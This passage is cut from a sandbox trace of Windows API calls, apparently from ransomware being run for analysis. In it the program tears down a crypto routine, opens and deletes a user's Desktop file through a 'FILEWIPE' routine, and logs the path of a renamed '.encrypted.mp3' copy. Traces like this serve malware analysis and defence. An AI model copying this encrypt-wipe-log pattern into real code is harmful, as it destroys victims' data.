lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0030.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.510] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.510] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.510] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0030.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.510] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.510] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0030.510] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0030.510] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0030.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0030.511] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.511] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0030.511] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.511] FreeLibrary (hLibModule=0x754b0000) returned 1 [0030.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0030.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0030.512] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0030.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0030.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.512] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f6c11b0, ftCreationTime.dwHighDateTime=0x1d5c0d9, ftLastAccessTime.dwLowDateTime=0xdf97b070, ftLastAccessTime.dwHighDateTime=0x1d5c46c, ftLastWriteTime.dwLowDateTime=0xdf97b070, ftLastWriteTime.dwHighDateTime=0x1d5c46c, nFileSizeHigh=0x0, nFileSizeLow=0x165c8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="TLkm8G.mp3", cAlternateFileName="")) returned 0x7c2100 [0030.512] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0030.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0030.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0030.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.513] CharLowerBuffW (in: lpsz="byte[91592]", cchLength=0xb | out: lpsz="byte[91592]") returned 0xb [0030.513] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0030.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.513] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0030.513] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0030.514] FreeLibrary (hLibModule=0x76b40000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.514] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0030.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0030.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.515] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0030.515] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.515] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tlkm8g.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0030.515] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0030.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0030.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0030.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0030.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0030.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0030.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0030.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0030.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0030.516] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0030.516] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.516] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.516] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.516] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0030.516] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.516] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.516] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.517] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3", lpFilePart=0x0) returned 0x30 [0030.517] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f6c11b0, ftCreationTime.dwHighDateTime=0x1d5c0d9, ftLastAccessTime.dwLowDateTime=0xdf97b070, ftLastAccessTime.dwHighDateTime=0x1d5c46c, ftLastWriteTime.dwLowDateTime=0x12124020, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x165c8, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="TLkm8G.mp3", cAlternateFileName="")) returned 0x7c2100 [0030.517] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tlkm8g.mp3")) returned 1 [0030.518] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f6c11b0, ftCreationTime.dwHighDateTime=0x1d5c0d9, ftLastAccessTime.dwLowDateTime=0xdf97b070, ftLastAccessTime.dwHighDateTime=0x1d5c46c, ftLastWriteTime.dwLowDateTime=0x12124020, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x165c8, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="TLkm8G.mp3", cAlternateFileName="")) returned 0 [0030.518] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0030.518] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.519] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.519] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0030.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0030.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0030.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0030.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0030.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0030.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0030.520] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.520] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0030.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.520] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0030.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.520] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0030.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0030.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.521] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0030.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0030.521] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0030.521] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.521] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.521] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0030.521] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.521] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0030.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x88ffb0 [0030.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.522] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0030.522] ReadFile (in: hFile=0x140, lpBuffer=0x936008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x936008*, lpNumberOfBytesRead=0x6aee3c*=0x3ea, lpOverlapped=0x0) returned 1 [0030.523] ReadFile (in: hFile=0x140, lpBuffer=0x936008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x936008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0030.523] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x3ea, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.523] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0030.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0030.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0030.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.encrypted.mp3\r\n", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0030.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3d) returned 0x7ab380 [0030.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.encrypted.mp3\r\n", cchWideChar=61, lpMultiByteStr=0x7ab380, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.encrypted.mp3\r\n", lpUsedDefaultChar=0x0) returned 61 [0030.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0030.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0030.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.523] WriteFile (in: hFile=0x140, lpBuffer=0x7ab338*, nNumberOfBytesToWrite=0x3c, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7ab338*, lpNumberOfBytesWritten=0x6aee3c*=0x3c, lpOverlapped=0x0) returned 1 [0030.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0030.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.524] CloseHandle (hObject=0x140) returned 1 [0030.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0030.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x936008 | out: hHeap=0x770000) returned 1 [0030.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0030.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0030.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0030.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0030.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0030.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0030.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0030.526] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0030.526] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0030.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0030.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0030.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0030.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 